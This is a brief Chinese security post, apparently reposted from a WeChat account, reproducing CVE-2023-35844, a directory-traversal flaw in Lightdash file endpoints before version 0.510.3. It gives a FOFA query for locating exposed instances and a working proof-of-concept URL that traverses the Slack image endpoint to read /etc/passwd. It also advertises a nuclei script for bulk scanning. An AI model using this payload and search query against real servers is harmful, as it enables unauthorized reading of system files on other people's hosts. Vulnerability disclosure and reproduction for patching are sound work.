简介
Lightdash 0.510.3之前版本中的Packages/Backend/src/Routers具有不安全的文件端点,例如,它们允许..目录遍历,并且不确保使用预期的文件扩展名(.csv或.png)。
自检命令
fofa:"Lightdash"
POC
/api/v1/slack/image/slack-image%2F..%2F..%2F..%2Fetc%2Fpasswd
nuclei批量脚本
公众号回复CVE-2023-35844获得自动化脚本
原文始发于微信公众号(小白安全工具):[复现]Lightdash CVE-2023-35844
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论